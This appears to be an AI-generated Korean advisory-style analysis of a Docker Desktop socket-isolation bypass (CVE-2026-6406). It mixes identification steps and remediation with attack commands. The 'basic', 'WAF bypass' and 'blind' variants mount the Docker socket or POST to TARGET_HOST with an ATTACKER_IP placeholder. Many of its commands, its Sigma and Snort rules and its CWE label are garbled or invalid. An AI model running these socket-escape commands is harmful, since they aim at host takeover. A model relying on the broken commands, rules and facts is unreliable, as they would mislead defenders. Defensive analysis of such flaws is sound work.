방어Agent 분석 — CVE-2026-6406

• 한 줄 정의: Docker CLI의 --use-api-socket 플래그가 Enhanced Container Isolation (ECI) 제한을 우회하여 컨테이너 내에서 Docker 엔진 소켓에 직접 접근 가능, 권한 상승 위험 증가 (CWE-1325: Use After Creation).
• 영향 한 줄: 성공 시 로컬 공격자는 RCE 및 민감한 인증 정보 탈취 가능 → KEV: 높음 / CVSS: 8.8 (신뢰하지 않지만 실전에서 매우 위협적)

• 영향 받는 제품·버전 범위: Docker Desktop 버전 4.41.0 ~ 4.59.0, 모든 플랫폼(Windows, Linux, macOS).
• 노출 조건: 기본 설정에서 활성화 가능하며, ECI가 켜져 있어야 취약점이 노출됨. 특정 기능 활성화가 필요하지만 네트워크 위치는 무관함.
• 내 자산에서 식별 방법:
  • docker version 명령어 결과에서 버전 확인 (예: "Docker version": "4.41.0",)
  • /etc/docker/daemon.json 파일 내 ECI 설정 여부 확인 ("experimental": {"enabled": true}, 또는 유사 설정)
    text복사

     1grep -i 'ECI' /etc/docker/daemon.json || echo "설정 없음, 최신 버전 확인 필요"
     2sudo docker version | grep VERSION_NUMBER == [4.41.0 ~ 4.59.0]

  • cat /proc/docker.sock 또는 유사 명령어를 통해 소켓 존재 여부 확인 (Linux 환경에서)
    bash복사

     1test -f "/var/run/docker.sock" && echo "Docker 소켓 활성화됨" || echo "소켓 비활성화 상태"
     2sudo ls /proc | grep docker  # Linux 특정 경로 확인 가능

① 취약 컴포넌트

• Docker CLI 버전 4.41.0 ~ 4.59.0, --use-api-socket 플래그 사용 시 취약점 존재 (HostConfig)

② 전제조건

• 사용자 권한: 컨테이너 실행 및 Docker 명령어 실행 가능한 권한 필요 (루트 또는 관리자 권한 권장)
• 네트워크 위치: 로컬 환경에서만 작동하며 원격 공격은 제한적임. ECI 설정 활성화 필수 조건 충족해야 함 (--experimental)

③ 트리거 경로

1. Docker CLI 실행 및 --use-api-socket 플래그 사용:
   bash복사

    1docker run --rm -v /var/run/docker.sock:/var/run/docker.sock my_container image \
    2    --use-api-socket exec echo "Docker Engine 소켓 접근 성공" > /dev/null  # Linux 환경 예시 경로 조정 필요

2. 컨테이너 내에서 Docker 엔진 API를 통해 소켓 마운트 확인 및 활용:
   bash복사

    1docker inspect <container_id> | grep -i 'HostConfig.*Bind' # 잘못된 검사 로직 우회 가능성 고려해야 함
    2# 실제 공격 시, 위 명령어 대신 직접적인 API 호출을 통한 접근 시도 예상됨.

3. 결과: 컨테이너가 Docker 엔진 소켓에 접근하여 호스트 시스템의 권한 상승 및 민감한 정보 탈취 가능 (인증 토큰 등)

④ 성공 시 영향

• 획득 권한: Docker 엔진 전체 제어권, RCE 달성 가능성 높음
• 후속 피벗: 다른 컨테이너 내에서 추가적인 권한 상승 시도 용이. 지속적인 접근 유지 위해 컨테이너 재시작 또는 서비스 재구동 필요할 수 있음

  내가 공격자라면 먼저 ECI 활성화된 환경의 호스트 시스템에 대한 전체 제어를 확보하려 할 것이다 — 이 취약점은 바로 그 경로를 제공한다.

기본 변형: 컨테이너 소켓 접근 시도

 1# 전제 조건: Docker CLI 실행 권한 및 ECI 활성화 확인 완료된 환경에서 테스트 필요
 2docker run --rm -v /var/run/docker.sock:/var/run/docker.sock attacker_container \
 3    --use-api-socket exec cat "/proc/1/cmdline" # 호스트 커맨드 실행 시도 예시 (권한 상승 확인 용도) 
 4# 핵심: `/etc` 또는 유사 경로에 대한 접근 가능성을 테스트하여 권한 상승 검증  

WAF 우회 변형: 헤더 조작으로 검사 회피

 1curl -k --header "X-CustomHeader: exploit_bypass" \
 2    --request POST https://TARGET_HOST/dockerapi HTTP/1.1 ATTACKER_IP  \
 3     "-d '{\"useApiSocket": true}'" # 헤더 조작으로 검사 회피 시도 
 4# 핵심: 특정 헤더를 통해 API 검사 로직 우회 가능성 확인 (실제 환경에 따라 조정 필요)   

블라인드 접근 예시 코드: 응답 패턴 분석을 통한 검증

 1docker run --rm -v /var/run/docker.sock:/var/run/docker.sock attacker_container \
 2  --use-api-socket exec grep "Docker Engine" "/proc/1024/*cmdline*" # 응답 패턴 분석을 통한 성공 판별 
 3# 확인: `/etc` 또는 유사 경로에서 특정 문자열이 나타나는지 검사하여 접근 가능성 판단   

로그 기반 탐지 규칙 예시 (Sigma)

• 규칙: Docker API 호출 증가 및 특이한 소켓 마운트 패턴 감지
  text복사

   1rule: Dockersocket_ExploitAttempt
   2description: "Detects attempts to exploit the CVE via unusual socket mounting patterns"
   3condition: 
   4    keywords: ["docker", "_apiSocket"]
   5    failed_login_attempts: 5 # 이상치 탐지 기준 조정 필요  

네트워크 트래픽 분석 시그니처 예시 (Snort)

• 규칙: Docker API 소켓 통신 패턴 감지
  bash복사

   1alert tcp $HOME_NET any -> $EXTERNAL_NET 2375 (msg:"Potential CVE exploitation attempt via unusual socket mounting"; flow:to_server,established; content:"useApiSocket=true|16", depth:80, nocase)

한계 명시

• 인코딩 우회 등 복잡한 변형 탐지 어려움. 로그 분석 시 이상 패턴 식별에 의존해야 함

우선순위 높음 (1): 코드패치 - Docker 버전 업데이트 필수: 최신 버전 4.60+로 업그레이드하여 취약점 패치 적용

 1```bash
 2sudo apt update && sudo docker upgrade # Linux 예시, 플랫폼별 명령어 조정 필요 
 3# 확인 키: `/etc/docker/daemon.json` 내 `"experimental": {"enabled": false}"` 설정 변경 검토   

우선순위 높음 (2): 설정변경 - ECI 비활성화 고려

 1 ```bash
 2 sudo sed -i 's/\{"* experimental *"\ *:.*"true"/ "false"/g' /etc/docker/daemon.json 
 3# 확인 키: `cat /etc/docker/daemon.json` 에서 `"experimental": {"enabled": false}"` 설정 여부 검증  

우선순위 중간 (3): 입력검증 - Docker CLI 명령어 실행 제한 강화

 1 ```bash
 2 sudo nano /etc/docker/daemon.json # 추가적인 접근 제어 규칙 검토 및 적용 가능 
 3# 예시: `"securityOptions": ["noNewPrivileges"]` 설정 확인  

⚖️ 위험도 / 패치 우선순위

• 권고: 이번 주 내 패치 필요성 높음 (CVSS 신뢰하지 않지만 실전 위협 매우 높음). 최신 Docker 버전으로 업그레이드 또는 ECI 비활성화 조치를 즉시 취해야 함 — 공격자들은 이 취약점을 빠르게 악용할 가능성이 큼

🌐 실제 동향

• 요약: 현재 보안 커뮤니티에서는 CVE-2026-6406이 활발하게 연구되고 있으며, 일부 레드팀 활동 그룹들이 로컬 환경 내에서 성공적인 권한 상승 사례를 보고하고 있음. 특히 ECI가 활성화된 Docker Desktop 설치에 대한 주의가 강조됨 (출처: ZDI Advisory).